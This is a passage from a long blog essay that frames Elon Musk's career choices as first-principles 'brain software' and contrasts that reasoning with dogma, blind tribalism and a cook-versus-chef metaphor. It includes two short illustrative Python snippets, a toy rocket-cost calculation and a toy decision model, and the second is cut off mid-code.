All together, the software I’ve described is a living, breathing system, constructed on a rock solid foundation of first principles, and built to be nimble, to keep itself honest, and to change shape as needed to best serve its owner.
And if you read about Elon Musk’s life, you can watch this software in action.
How Musk’s software wrote his life story
Getting started
Step 1 for Elon was filling in the contents of the Want box. Doing this from first principles is a huge challenge—you have to dig deep into concepts like right and wrong, good and bad, important and valuable, frivolous and trivial. You have to figure out what you respect, what you disdain, what fascinates you, what bores you, and what excites you deep in your inner child. Of course, there’s no way for anyone of any age to have a clear cut answer to these questions, but Elon did the best thing he could by ignoring others and independently pondering.
I talked with him about his early thought process in figuring out what to do with his career. He has said many times that he cares deeply about the future well-being of the human species—something that is clearly in the center of his Want box. I asked how he came to that, and he explained:
The thing that I care about is—when I look into the future, I see the future as a series of branching probability streams. So you have to ask, what are we doing to move down the good stream—the one that’s likely to make for a good future? Because otherwise, you look ahead, and it’s like “Oh it’s dark.” If you’re projecting to the future, and you’re saying “Wow, we’re gonna end up in some terrible situation,” that’s depressing.
Fair. Homing in on his specific path, I brought up the great modern physicists like Einstein and Hawking and Feynman, and I asked him whether he considered going into scientific discovery instead of engineering. His response:
I certainly admire the discoveries of the great scientists. They’re discovering what already exists—it’s a deeper understanding of how the universe already works. That’s cool—but the universe already sort of knows that. What matters is knowledge in a human context. What I’m trying to ensure is that knowledge in a human context is still possible in the future. So it’s sort of like—I’m more like the gardener, and then there are the flowers. If there’s no garden, there’s no flowers. I could try to be a flower in the garden, or I could try to make sure there is a garden. So I’m trying to make sure there is a garden, such that in the future, many Feynmans may bloom.
In other words, both A and B are good, but without A there is no B. So I choose A.
He went on:
I was at one point thinking about doing physics as a career—I did undergrad in physics—but in order to really advance physics these days, you need the data. Physics is fundamentally governed by the progress of engineering. This debate—“Which is better, engineers or scientists? Aren’t scientists better? Wasn’t Einstein the smartest person?”—personally, I think that engineering is better because in the absence of the engineering, you do not have the data. You just hit a limit. And yeah, you can be real smart within the context of the limit of the data you have, but unless you have a way to get more data, you can’t make progress. Like look at Galileo. He engineered the telescope—that’s what allowed him to see that Jupiter had moons. The limiting factor, if you will, is the engineering. And if you want to advance civilization, you must address the limiting factor. Therefore, you must address the engineering.
A and B are both good, but B can only advance if A advances. So I choose A.
In thinking about where exactly to point himself to best help humanity, Musk says that in college, he thought hard about the first principles question, “What will most affect the future of humanity?” and put together a list of five things: “the internet; sustainable energy; space exploration, in particular the permanent extension of life beyond Earth; artificial intelligence; and reprogramming the human genetic code.”5
Hearing him talk about what matters to him, you can see up and down the whole stack of Want box reasoning that led him to his current endeavors.
He has other reasons too. Next to wanting to help humanity in the Want box is this quote:
I’m interested in things that change the world or affect the future, and wondrous new technology where you see it and you’re like, “How did that even happen? How is that possible?”
This follows a theme of Musk being passionate about super-advanced technology and the excitement it brings to him and other people. So an ideal endeavor for Musk would be something to do with engineering, something in an area that will be important for the future, and something to do with cutting-edge technology. Those broad, basic Want box items alone narrow down the goal pool considerably.
Meanwhile, he was a teenager with no money, reputation, or connections, and limited knowledge and skills. In other words, his Reality box wasn’t that big. So he did what many young people do—he focused his early goals not around achieving his Wants, but expanding the Reality box and its list of “things that are possible.” He wanted to be able to legally stay in the US after college, and he also wanted to gain more knowledge about engineering, so he killed two birds with one stone and applied to a PhD program at Stanford to study high energy density capacitors, a technology aimed at coming up with a more efficient way than traditional batteries to store energy.
U-turn to the internet
Musk had gone into the Goal Pool and picked the Stanford program, and he moved to California to get started. But there was one thing—it was 1995. The internet was in the early stages of taking off and moving much faster than people had anticipated. It was also a world he could dive into without money or a reputation. So Musk added a bunch of internet-related possibilities into his Reality box. The early internet was also more exciting than he had anticipated—so getting involved in it quickly found its way into his Want box.
These rapid adjustments caused big changes in his Goal Pool, to the point where the Stanford PhD was no longer what his software’s goal formation center was outputting.
Most people would have stuck with the Stanford program—because they had already told everyone about it and it would be weird to quit, because it was Stanford, because it was a more normal path, because it was safer, because the internet might be a fad, because what if he were 35 one day and was a failure with no money because he couldn’t get a good job without the right degree.
Musk quit the program after two days. The big macro arrow of his software came down on the right, saw that what he was embarking on wasn’t in the Goal Pool anymore, and he trusted his software—so he made a macro change.
He and his brother started Zip2, an early cross between the concepts of the Yellow Pages and Google Maps. Four years later, they sold the company and Elon walked away with $22 million.
As a dotcom millionaire, the conventional wisdom was to settle down as a lifelong rich guy and either invest in other companies or start something new with other people’s money.
But Musk’s goal formation center had other ideas. His Want box was bursting with ambitious startup ideas that he thought could have major impact on the world, and his Reality box, which now included $22 million, told him that he had a high chance of succeeding. Being leisurely on the sidelines was nowhere in his Want box and totally unnecessary according to his Reality box.
So he used his newfound wealth to start X.com in 1999, with the vision to build a full-service online financial institution. The internet was still young and the concept of storing your money in an online bank was totally inconceivable to most people, and Musk was advised by many that it was a crazy plan. But again, Musk trusted his software. What he knew about the internet told him that this was inside the Reality box—because his reasoning told him that when it came to the internet, the Reality box had grown much bigger than people realized—and that was all he needed to know to move forward. In the top part of his software, as his strategy-action-results-adjustments loop spun, X.com’s service changed, the team changed, the mission changed, even the name changed. By the time eBay bought it in 2002, the company was called PayPal and it was a money transfer service. Musk made $180 million.
Following his software to space
Now 31 years old and fabulously wealthy, Musk had to figure out what to do next with his life. On top of the “whatever you do, definitely don’t risk losing that money you have” conventional wisdom, there was also the common logic that said, “You’re awesome at building internet companies, but that’s all you know since you’ve never done anything else. You’re in your thirties now and it’s too late to do something big in a whole different field. This is the path you chose—you’re an internet guy.”
But Musk went back to first principles. He looked inwards to his Want box, and having reflected on things, doing another internet thing wasn’t really in the box anymore. What was in there was his still-burning desire to help the future of humanity. In particular, he felt that to have a long future, the species would have to become much better at space travel.
So he started exploring the limits of the Reality box when it came to getting involved in the aerospace industry.
Conventional wisdom screamed at the top of its lungs for him to stop. It said he had no formal education in the field and didn’t know the first thing about being a rocket scientist. But his software told him that formal education was just another way to download information into your brain and “a painfully slow download” at that—so he started reading, meeting people, and asking questions.
Conventional wisdom said no entrepreneur had ever succeeded at an endeavor like this before, and that he shouldn’t risk his money on something so likely to fail. But Musk’s stated philosophy is, “When something is important enough, you do it even if the odds are not in your favor.”
Conventional wisdom said that he couldn’t afford to build rockets because they were too expensive and pointed to the fact that no one had ever made a rocket that cheaply before—but like the scientists who ignored those who said the Earth was 6,000 years old and those who insisted the Earth was flat, Musk started crunching numbers to do the math himself. Here’s how he recounts his thoughts:
Historically, all rockets have been expensive, so therefore, in the future, all rockets will be expensive. But actually that’s not true. If you say, what is a rocket made of? It’s made of aluminum, titanium, copper, carbon fiber. And you can break it down and say, what is the raw material cost of all these components? And if you have them stacked on the floor and could wave a magic wand so that the cost of rearranging the atoms was zero, then what would the cost of the rocket be? And I was like, wow, okay, it’s really small—it’s like 2% of what a rocket costs. So clearly it would be in how the atoms are arranged—so you’ve got to figure out how can we get the atoms in the right shape much more efficiently. And so I had a series of meetings on Saturdays with people, some of whom were still working at the big aerospace companies, just to try to figure out if there’s some catch here that I’m not appreciating. And I couldn’t figure it out. There doesn’t seem to be any catch. So I started SpaceX.6
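The shape of that calculation is easy to sketch. With made-up masses and commodity prices (illustrative only, not Musk’s actual numbers), it looks something like this:

```python
# Illustrative only: hypothetical masses and commodity prices, not real figures.
materials_kg = {"aluminum": 20_000, "titanium": 2_000, "copper": 1_000, "carbon_fiber": 3_000}
price_per_kg = {"aluminum": 3, "titanium": 30, "copper": 9, "carbon_fiber": 25}

raw_material_cost = sum(kg * price_per_kg[name] for name, kg in materials_kg.items())
sticker_price = 60_000_000  # hypothetical price of a conventionally built rocket, in dollars

print(f"raw materials: ${raw_material_cost:,}")                             # $204,000 with these toy numbers
print(f"share of sticker price: {raw_material_cost / sticker_price:.1%}")   # well under even the ~2% Musk cites
```

Swap in real masses and prices and the conclusion Musk describes either holds or it doesn’t; the point is that the check is a few lines of arithmetic, not a leap of faith.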
History, conventional wisdom, and his friends all said one thing, but his own software, reasoning upwards from first principles, said another—and he trusted his software. He started SpaceX, again with his own money, and dove in head first. The mission: dramatically lower the cost of space travel to make it possible for humanity to become multi-planetary.
Tesla and beyond
Two years later, while running a growing SpaceX, a friend brought Elon to a company called AC Propulsion, which had created a prototype for a super-fast, long-range electric car. It blew him away. The Reality box of Musk’s software had told him that such a thing wasn’t yet possible, but it turns out that Musk wasn’t aware of how far lithium-ion batteries had advanced, and what he saw at AC Propulsion was new information about the world that put “starting a top-notch electric car company” into the Reality box in his head.
He ran into the same conventional wisdom about battery costs as he had about rocket costs. Batteries had never been made cheaply enough to allow for a mass-market, long-range electric car because battery prices were simply too high and always would be. He used the same first principles logic and a calculator to determine that most of the problem was middlemen, not raw materials, and decided that actually, conventional wisdom was wrong and batteries could be much cheaper in the future. So he co-founded Tesla with the mission of accelerating the advent of a mostly-electric-vehicle world—first by pouring in resources power and funding the company, and later by contributing his time and energy power as well and becoming CEO.
Two years after that, he co-founded SolarCity with his cousins, a company whose goal was to revolutionize energy production by creating a large, distributed utility that would install solar panel systems on millions of people’s homes. Musk knew that his time/energy power, the one kind of power that has hard limits, no matter who you are, was mostly used up, but he still had plenty of resources power—so he put it to work on another goal in his Goal Pool.
Most recently, Musk has jumpstarted change in another area that’s important to him—the way people transport themselves from city to city. His idea is that there should be an entirely new mode of transport that will whiz people hundreds of miles by zinging them through a tube. He calls it the Hyperloop. For this project, he’s not using his time, energy, or resources. Instead, by laying out his initial thoughts in a white paper and hosting a competition for engineers to test out their innovations, he’s leveraging his powers of connection and persuasion to create change.
There are all kinds of tech companies that build software. They think hard, for years, about the best, most efficient way to make their product. Musk sees people as computers, and he sees his brain software as the most important product he owns—and since there aren’t companies out there designing brain software, he designed his own, beta tests it every day, and makes constant updates. That’s why he’s so outrageously effective, why he can disrupt multiple huge industries at once, why he can learn so quickly, strategize so cleverly, and visualize the future so clearly.
This part of what Musk does isn’t rocket science—it’s common sense. Your entire life runs on the software in your head—why wouldn’t you obsess over optimizing it?
And yet, not only do most of us not obsess over our own software—most of us don’t even understand our own software, how it works, or why it works that way. Let’s try to figure out why.
Most People’s Software
You always hear facts about human development and how so much of who you become is determined by your experiences during your formative years. A newborn’s brain is a malleable ball of hardware clay, and its job upon being born is to quickly learn about whatever environment it’s been born into and start shaping itself into the optimal tool for survival in those circumstances. That’s why it’s so easy for young children to learn new skills.
As people age, the clay begins to harden and it becomes more difficult to change the way the brain operates. My grandmother has been using a computer as long as I have, but I use mine comfortably and easily because my malleable childhood brain easily wrapped itself around basic computer skills, while she has the same face on when she uses her computer that my tortoise does when I put him on top of a glass table and he thinks he’s inexplicably hovering two feet above the ground. She’ll use a computer when she needs to, but it’s not her friend.
So when it comes to our brain software—our values, perceptions, belief systems, reasoning techniques—what are we learning during those key early years?
Everyone’s raised differently, but for most people I know, it went something like this:
We were taught all kinds of things by our parents and teachers—what’s right and wrong, what’s safe and dangerous, the kind of person you should and shouldn’t be. But the idea was: I’m an adult so I know much more about this than you, it’s not up for debate, don’t argue, just obey. That’s when the clichéd “Why?” game comes in (what MuskSpeak calls “the chained why”).
A child’s instinct isn’t just to know what to do and not to do; she wants to understand the rules of her environment. And to understand something, you have to have a sense of how that thing was built. When parents and teachers tell a kid to do XYZ and to simply obey, it’s like installing a piece of already-designed software in the kid’s head. When kids ask Why? and then Why? and then Why?, they’re trying to deconstruct that software to see how it was built—to get down to the first principles underneath so they can weigh how much they should actually care about what the adults seem so insistent upon.
The first few times a kid plays the Why game, parents think it’s cute. But many parents, and most teachers, soon come up with a way to cut the game off:
Because I said so.
“Because I said so” inserts a concrete floor into the child’s deconstruction effort below which no further Why’s may pass. It says, “You want first principles? There. There’s your floor. No more Why’s necessary. Now fucking put your boots on because I said so and let’s go.”
Imagine how this would play out in the science world.
[Comic panels: Higgs and Hawking]
In fairness, parents’ lives suck. They have to do all the shit they used to have to do, except now on top of that there are these self-obsessed, drippy little creatures they have to upkeep, who think parents exist to serve them. On a busy day, in a bad mood, with 80 things to do, the Why game is a nightmare.
But it might be a nightmare worth enduring. A command or a lesson or a word of wisdom that comes without any insight into the steps of logic it was built upon is feeding a kid a fish instead of teaching them to reason. And when that’s the way we’re brought up, we end up with a bucket of fish and no rod—a piece of installed software that we’ve learned how to use, but no ability to code anything ourselves.
School makes things worse. One of my favorite thinkers, writer Seth Godin (whose blog is bursting with first principles reasoning wisdom), explains in a TED Talk about school that the current education system is a product of the Industrial Age, a time that catapulted productivity and the standard of living. But along with many more factories came the need for many more factory workers, so our education system was redesigned around that goal. He explains:
The deal was: universal public education whose sole intent was not to train the scholars of tomorrow—we had plenty of scholars. It was to train people to be willing to work in the factory. It was to train people to behave, to comply, to fit in. “We process you for a whole year. If you are defective, we hold you back and process you again. We sit you in straight rows, just like they organize things in the factory. We build a system all about interchangeable people because factories are based on interchangeable parts.”
Couple that concept with what another favorite writer of mine, James Clear, explained recently on his blog:
In the 1960s, a creative performance researcher named George Land conducted a study of 1,600 five-year-olds and 98 percent of the children scored in the “highly creative” range. Dr. Land re-tested each subject during five year increments. When the same children were 10-years-old, only 30 percent scored in the highly creative range. This number dropped to 12 percent by age 15 and just 2 percent by age 25. As the children grew into adults they effectively had the creativity trained out of them. In the words of Dr. Land, “non-creative behavior is learned.”
It makes sense, right? Creative thinking is a close cousin of first principles reasoning. In both cases, the thinker needs to invent his own thought pathways. People think of creativity as a natural born talent, but it’s actually much more of a way of thinking—it’s the thinking version of painting onto a blank canvas. But to do that requires brain software that’s skilled and practiced at coming up with new things, and school trains us on the exact opposite thing—to follow the leader, single-file, and to get really good at taking tests. Instead of a blank canvas, school hands kids a coloring book and tells them to stay within the lines.3
What this all amounts to is that during our brain’s most malleable years, parents, teachers, and society end up putting our clay in a mold and squeezing it tightly into a preset shape.
And when we grow up, without having learned how to build our own style of reasoning and having gone through the early soul-searching that independent thinking requires, we end up needing to rely on whatever software was installed in us for everything—software that, coming from parents and teachers, was probably itself designed 30 years ago.
30 years, if we’re lucky. Let’s think about this for a second.
Just say you have an overbearing mother who insists you grow up with her values, her worldview, her fears, and her ambitions—because she knows best, because it’s a scary world out there, because XYZ is respectable, because she said so.
Your head might end up running your whole life on “because mom says so” software. If you play the Why? game with something like the reason you’re in your current job, it may take a few Why’s to get there, but you’ll most likely end up hitting a concrete floor that says some version of “because mom says so.”
But why does mom say so?
Mom says so because her mom said so—after growing up in Poland in 1932, where she was from a home where her dad said so because his dad—a minister from a small town outside Krakow—said so after his grandfather, who saw some terrible shit go down during the Siberian Uprising of 1866, ingrained in his children’s heads the critical life lesson to never associate with blacksmiths.
Through a long game of telephone, your mother now looks down upon office jobs and you find yourself feeling strongly that the only truly respectable career is in publishing. And you can list off a bunch of reasons why you feel that way—but if someone really grilled you on your reasons and on the reasoning beneath them, you’d end up in a confusing place. It gets confusing way down there because the first principles foundation at the bottom is a mishmash of the values and beliefs of a bunch of people from different generations and countries—a bunch of people who aren’t you.
A common example of this in today’s world is that many people I know were raised by people who were raised by people who went through the Great Depression. If you solicit career advice from someone born in the US in the 1920s, there’s a good chance you’ll get an answer pumped out by this software:
[Diagram: Grandma’s software]
The person has lived a long life and has made it all the way to 2015, but their software was coded during the Great Depression, and if they’re not the type to regularly self-reflect and evolve, they still do their thinking with software from 1930. And if they installed that same software in their children’s heads and their children then passed it on to their own children, a member of Generation Y today might feel too scared to pursue an entrepreneurial or artistic endeavor and be totally unaware that they’re actually being haunted by the ghost of the Great Depression.
When old software is installed on new computers, people end up with a set of values not necessarily based on their own deep thinking, a set of beliefs about the world not necessarily based on the reality of the world they live in, and a bunch of opinions they might have a hard time defending with an honest heart.
In other words, a whole lot of convictions not really based on actual data. We have a word for that.
Dogma
I don’t know what’s the matter with people: they don’t learn by understanding, they learn by some other way—by rote or something. Their knowledge is so fragile! —Richard Feynman
Dogma is everywhere and comes in a thousand different varieties—but the format is generally the same:
X is true because [authority] says so. The authority can be many things.
[Image: “Because I said so”]
Dogma, unlike first principles reasoning, isn’t customized to the believer or her environment and isn’t meant to be critiqued and adjusted as things change. It’s not software to be coded—it’s a printed rulebook. Its rules may be originally based on reasoning by a certain kind of thinker in a certain set of circumstances, at a time far in the past or a place far away, or it may be based on no reasoning at all. But that doesn’t matter because you’re not supposed to dig too deep under the surface anyway—you’re just supposed to accept it, embrace it, and live by it. No evidence needed.
You may not like living by someone else’s dogma, but you’re left without much choice. When your childhood attempts at understanding are met with “Because I said so,” and you absorb the implicit message “Your own reasoning capability is shit, don’t even try, just follow these rules so you don’t fuck your life up,” you grow up with little confidence in your own reasoning process. When you’re never forced to build your own reasoning pathways, you’re able to skip the hard process of digging deep to discover your own values and the sometimes painful experience of testing those values in the real world and learning you want to adjust them—and so you grow up a total reasoning amateur.
Only strong reasoning skills can carve a unique life path, and without them, dogma will quickly have you living someone else’s life. Dogma doesn’t know you or care about you and is often completely wrong for you—it’ll have a would-be happy painter spending their life as a lawyer and a would-be happy lawyer spending their life as a painter.
But when you don’t know how to reason, you don’t know how to evolve or adapt. If the dogma you grew up with isn’t working for you, you can reject it, but as a reasoning amateur, going it alone usually ends with you finding another dogma lifeboat to jump onto—another rulebook to follow and another authority to obey. You don’t know how to code your own software, so you install someone else’s.
People don’t do any of this intentionally—usually if we reject a type of dogma, our intention is to break free of a life of dogmatic thinking all together and brave the cold winds of independent reasoning. But dogmatic thinking is a hard habit to break, especially when it’s all you know. I have a friend who just had a baby, and she told me that she was so much more open-minded than her parents, because they wanted her to have a prestigious career, but she’d be open to her daughter doing anything. After a minute, she thought about it, and said, “Well actually, no, what I mean by that is if she wanted to go do something like spend her life on a farm in Montana, I’d be fine with that and my parents never would have been—but if she said she wanted to go work at a hedge fund, I’d kill her.” She realized mid-sentence that she wasn’t free of the rigid dogmatic thinking of her parents, she had just changed dogma brands.
This is the dogma trap, and it’s hard to escape from. Especially since dogma has a powerful ally—the group.
Tribes
Some things I think are very conservative, or very liberal. I think when someone falls into one category for everything, I’m very suspicious. It doesn’t make sense to me that you’d have the same solution to every issue. —Louis C.K.
What most dogmatic thinking tends to boil down to is another good Seth Godin phrase:
People like us do stuff like this.
It’s the rallying cry of tribalism.
There’s an important distinction to make here. Tribalism tends to have a negative connotation, but the concept of a tribe itself isn’t bad. All a tribe is is a group of people linked together by something they have in common—a religion, an ethnicity, a nationality, family, a philosophy, a cause. Christianity is a tribe. The Democratic Party is a tribe. Australians are a tribe. Radiohead fans are a tribe. Arsenal fans are a tribe. The musical theater scene in New York is a tribe. Temple University is a tribe. And within large, loose tribes, there are smaller, tighter, sub-tribes. Your extended family is a tribe, of which your immediate family is a sub-tribe. Americans are a tribe, of which Texans are a sub-tribe, of which Evangelical Christians in Amarillo, Texas is a sub-sub-tribe.
What makes tribalism a good or bad thing depends on the tribe member and their relationship with the tribe. In particular, one simple distinction:
Tribalism is good when the tribe and the tribe member both have an independent identity and they happen to be the same. The tribe member has chosen to be a part of the tribe because it happens to match who he really is. If either the identity of the tribe or the member evolves to the point where the two no longer match, the person will leave the tribe. Let’s call this conscious tribalism.
Tribalism is bad when the tribe and tribe member’s identity are one and the same. The tribe member’s identity is determined by whatever the tribe’s dogma happens to say. If the identity of the tribe changes, the identity of the tribe member changes with it in lockstep. The tribe member’s identity can’t change independent of the tribal identity because the member has no independent identity. Let’s call this blind tribalism.
With conscious tribalism, the tribe member and his identity come first. The tribe member’s identity is the alpha dog, and who he is determines the tribes he’s in. With blind tribalism, the tribe comes first. The tribe is the alpha dog and it’s the tribe that determines who he is.
This isn’t black and white—it’s a spectrum—but when someone is raised without strong reasoning skills, they may also lack a strong independent identity and end up vulnerable to the blind tribalism side of things—especially with the various tribes they were born into. That’s what Einstein was getting at when he said, “Few people are capable of expressing with equanimity opinions which differ from the prejudices of their social environment. Most people are even incapable of forming such opinions.”
A large tribe like a religion or a political party or a nation will contain members who fall across the whole range of the blind-to-conscious spectrum. But some tribes, by their nature, attract a certain type of follower. It makes logical sense that the more rigid and certain and dogmatic the tribe, the more likely it’ll be to attract blind tribe members. ISIS is going to have a far higher percentage of blind tribe members than the London Philosophy Club.
The allure of dogmatic tribes makes sense—they appeal to very core parts of human nature.
Humans crave connection and camaraderie, and a guiding dogma is a common glue to bond together a group of unique individuals as one.
Humans want internal security, and for someone who grows up feeling shaky about their own distinctive character, a tribe and its guiding dogma is a critical lifeline—a one-stop shop for a full suite of human opinions and values.
Humans also long for the comfort and safety of certainty, and nowhere is conviction more present than in the groupthink of blind tribalism. While a scientist’s data-based opinions are only as strong as the evidence she has and inherently subject to change, tribal dogmatism is an exercise in faith, and with no data to be beholden to, blind tribe members believe what they believe with certainty.
We discussed why math has proofs, science has theories, and in life, we should probably limit ourselves to hypotheses—but blind tribalism proceeds with the confidence of the mathematician:
Given (because the tribe says so): A = B
Given (because the tribe says so): B = C + D
Therefore (because the tribe says so): A = C + D
And since so many others in the tribe feel certain about things, your own certainty is reassured and reinforced.
But there’s a heavy cost to these comforts. Insecurity can be solved the hard way or the easy way—and by giving people the easy option, dogmatic tribes remove the pressure to do the hard work of evolving into a more independent person with a more internally-defined identity. In that way, dogmatic tribes are an enabler of the blind tribe member’s deficiencies.
The sneaky thing about both rigid tribal dogma and blind membership is that they like to masquerade as open-minded thought with conscious membership. I think many of us may be closer to the blind membership side of things with certain tribes we’re a part of than we recognize—and those tribes we’re a part of may not be as open-minded as we tend to think.
A good test for this is the intensity of the us factor. That key word in “People like us do stuff like this” can get you into trouble pretty quickly.
Us feels great. A major part of the appeal of being in a tribe is that you get to be part of an Us, something humans are wired to seek out. And a loose Us is nice—like the Us among conscious, independent tribe members.
But the Us in blind tribalism is creepy. In blind tribalism, the tribe’s guiding dogma doubles as the identity of the tribe members, and the Us factor enforces that concept. Conscious tribe members reach conclusions—blind tribe members are conclusions. With a blind Us, if the way you are as an individual happens to contain opinions, traits, or principles that fall outside the outer edges of the dogma walls, they will need to be shed—or things will get ugly. By challenging the dogma of your tribe, you’re challenging both the sense of certainty the tribe members gain their strength from and the clear lines of identity they rely on.
The best friend of a blind Us is a nemesis Us—Them. Nothing unites Us like a collectively hated anti-Us, and the blind tribe is usually defined almost as much by hating the dogma of Them as it is by abiding by the dogma of Us.
Whatever element of rigid, identity-encompassing blindness is present in your own tribal life will reveal itself when you dare to validate any part of the rival Them dogma.
Give it a try. The next time you’re with a member of a tribe you’re a part of, express a change of heart that aligns you on a certain topic with whoever your tribe considers to be Them. If you’re a religious Christian, tell people at church you’re not sure anymore that there’s a God. If you’re an artist in Boulder, explain at the next dinner party that you think global warming might actually be a liberal hoax. If you’re an Iraqi, tell your family that you’re feeling pro-Israel lately. If you and your husband are staunch Republicans, tell him you’re coming around on Obamacare. If you’re from Boston, tell your friends you’re pulling for the Yankees this year because you like their current group of players.
If you’re in a tribe with a blind mentality of total certainty, you’ll probably see a look of horror. It won’t just seem wrong, it’ll seem like heresy. They might get angry, they might passionately try to convince you otherwise, they might cut off the conversation—but there will be no open-minded conversation. And because identity is so intertwined with beliefs in blind tribalism, the person actually might feel less close to you afterwards. Because for rigidly tribal people, a shared dogma plays a more important role in their close relationships than they might recognize.
Most of the major divides in our world emerge from blind tribalism, and on the extreme end of the spectrum—where people are complete sheep—blind tribalism can lead to terrifying things. Like those times in history when a few charismatic bad guys can build a large army of loyal foot soldiers, just by displaying strength and passion. Because blind tribalism is the true villain behind our grandest-scale atrocities—
[Image: Equations]
Most of us probably wouldn’t have joined the Nazi party, because most of us aren’t on the extreme end of the blind-to-conscious spectrum. But I don’t think many of us are on the other end either. Instead, we’re usually somewhere in the hazy middle—in the land of cooks.4
The Cook and the Chef
The difference between the way Elon thinks and the way most people think is kind of like the difference between a cook and a chef.
The words “cook” and “chef” seem kind of like synonyms. And in the real world, they’re often used interchangeably. But in this post, when I say chef, I don’t mean any ordinary chef. I mean the trailblazing chef—the kind of chef who invents recipes. And for our purposes, everyone else who enters a kitchen—all those who follow recipes—is a cook.
Everything you eat—every part of every cuisine we know so well—was at some point in the past created for the first time. Wheat, tomatoes, salt, and milk go back a long time, but at some point, someone said, “What if I take those ingredients and do this…and this…..and this……” and ended up with the world’s first pizza. That’s the work of a chef.
Since then, god knows how many people have made a pizza. That’s the work of a cook.
The chef reasons from first principles, and for the chef, the first principles are raw edible ingredients. Those are her puzzle pieces and she works her way upwards from there, using her experience, her instincts, and her taste buds.
The cook works off of some version of what’s already out there—a recipe of some kind, a meal she tried and liked, a dish she watched someone else make.
Cooks span a wide range. On one end, you have cooks who only cook by following a recipe to a T—carefully measuring every ingredient exactly the way the recipe dictates. The result is a delicious meal that tastes exactly the way the recipe designed it. Down the range a bit, you have more of a confident cook—someone with experience who gets the general gist of the recipe and then uses her skills and instincts to do it her own way. The result is something a little more unique to her style that tastes like the recipe but not quite. At the far end of the cook range, you have an innovator who makes her own concoctions. A lamb burger with a vegetable bun, a peanut butter and jelly pizza, a cinnamon pumpkin seed cake.5
But what all of these cooks have in common is their starting point is something that already exists. Even the innovative cook is still making a version of a burger, a pizza, and a cake.
At the very end of the spectrum, you have the chef. A chef might make good food or terrible food, but whatever she makes, it’s a result of her own reasoning process, from the selection of raw ingredients at the bottom to the finished dish at the top.
[Image: Chef-Cook Spectrum]
In the culinary world, there’s nothing wrong with being a cook. Most people are cooks because for most people, inventing recipes isn’t a goal of theirs.
But in life—when it comes to the reasoning “recipes” we use to churn out a decision—we may want to think twice about where we are on the cook-chef spectrum.
On a typical day, a “reasoning cook” and a “reasoning chef” don’t operate that differently. Even the chef quickly becomes exhausted by the mental energy required for first principles reasoning, and usually, it isn’t worth his time. Both types of people spend an average day with their brain software running on auto-pilot and their conscious decision-making centers dormant.
But then comes a day when something new needs to be figured out. Maybe the cook and the chef are each given the new task at work to create a better marketing strategy. Or maybe they’re unhappy with that job and want to think of what business to start. Maybe they have a crush on someone they never expected to have feelings for and they need to figure out what to do about it.
Whatever this new situation is, auto-pilot won’t suffice—this is something new and neither the chef’s nor the cook’s software has done this before. Which leaves only two options:
Create. Or copy.
The chef says, “Ugh okay, here we go,” rolls up his sleeves, and does what he always does in these situations—he switches on the active decision-making part of his software and starts to go to work. He looks at what data he has and seeks out what more he needs. He thinks about the current state of the world and reflects on where his values and priorities are. He gathers together those relevant first principles ingredients and starts puzzling together a reasoning pathway. It takes some hard work, but eventually, the pathway brings him to a hypothesis. He knows it’s probably wrong-ish, and as new data emerges, he’ll “taste-test” the hypothesis and adjust it. He keeps the decision-making center on standby for the next few weeks as he makes a bunch of early adjustments to the flawed hypothesis—a little more salt, a little less sugar, one prime ingredient that needs to be swapped out for another. Eventually, he’s satisfied enough with how things are going to move back into auto-pilot mode. This new decision is now part of the automated routine—a new recipe is in the cookbook—and he’ll check in on it to make adjustments every once in a while or as new pertinent data comes in, the way he does for all parts of his software.
The cook has no idea what’s going on in the last paragraph. The reasoning cook’s software is called “Because the recipe said so,” and it’s more of a computerized catalog of recipes than a computer program. When the cook needs to make a life decision, he goes through his collection of authority-written recipes, finds the one he trusts in that particular walk of life, and reads through the steps to see what to do—kind of like WWJD, except the J is replaced by whatever authority is most trusted in that area. For most questions, the authority is the tribe, since the cook’s tribal dogma covers most standard decisions. But in this particular case, the cook leafed through the tribe’s cookbook and couldn’t find any section about this type of decision. So he needs to get a hold of a recipe from another authority he trusts with this type of thing. Once the cook finds the right recipe, he can put it in his catalog and use it for all future decisions on this matter.
First, the cook tries a few friends. His catalog doesn’t have the needed info, but maybe one of theirs does. He asks them for their advice—not so he can use it as additional thinking to supplement his own, but so it can become his own thinking.
If that doesn’t yield any strongly-opinionated results, he’ll go to the trusty eternal backstop—conventional wisdom.
Society as a whole is its own loose tribe, often spanning your whole nation or even your whole part of the world, and what we call “conventional wisdom” is its guiding dogma cookbook—online and available to the public. Typically, the larger the tribe, the more general and more outdated the dogma—and the conventional wisdom database runs like a DMV website last updated in 1992. But when the cook has nowhere else to turn, it’s like a trusty old friend.
And in this case—let’s say the cook is thinking of starting a business and wants to know what the possibilities are—conventional wisdom has him covered. He types the command into the interface, waits a few minutes, and then the system pumps out its answer:
[Image: CWDOS]
The cook, thoroughly discouraged, thanks the machine and updates his Reality box accordingly.
[Image: Cook Reality box]
With the decision made (not to start a business), he switches his software back into auto-pilot mode. Done and done.
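Since we’ve been pretending all along that brains run software, it might help to see the two programs written down. Here’s a rough sketch in Python, purely for illustration: the recipe catalog, the conventional wisdom lookup, and the taste-test loop are all invented stand-ins, not anything real, but they capture the shape of copy vs. create.

```python
# A toy model of "cook software" vs. "chef software".
# Every name and value here is invented purely for illustration.

# The cook's backstop: society's dogma cookbook, rarely updated.
CONVENTIONAL_WISDOM = {
    "should I start a business?": "Too risky. Keep the stable job.",
}

def cook_decide(question, recipe_catalog, friends):
    """Cook: find an existing recipe somewhere and copy it."""
    # 1) Check the tribe's cookbook first.
    if question in recipe_catalog:
        return recipe_catalog[question]
    # 2) Borrow a friend's recipe and adopt it as your own thinking.
    for friends_catalog in friends:
        if question in friends_catalog:
            recipe_catalog[question] = friends_catalog[question]
            return recipe_catalog[question]
    # 3) Last resort: conventional wisdom, however outdated.
    answer = CONVENTIONAL_WISDOM.get(question, "People like us don't do that.")
    recipe_catalog[question] = answer   # filed away for all future decisions
    return answer

def chef_decide(question, first_principles, taste_test, max_revisions=5):
    """Chef: puzzle a hypothesis together from first principles, then adjust it."""
    hypothesis = f"{question} -> " + " + ".join(first_principles)
    for _ in range(max_revisions):
        feedback = taste_test(hypothesis)   # new data from the real world
        if feedback is None:                # good enough, back to auto-pilot
            break
        hypothesis += f" (adjusted for {feedback})"
    return hypothesis

if __name__ == "__main__":
    catalog = {"what career?": "Become a lawyer."}        # tribe-issued recipes
    friends = [{"what diet?": "Whatever's trending."}]

    print(cook_decide("should I start a business?", catalog, friends))

    # The chef's taste test hands back one correction, then signs off.
    corrections = iter(["what customers actually want", None])
    print(chef_decide("should I start a business?",
                      ["what I want", "what the world looks like right now"],
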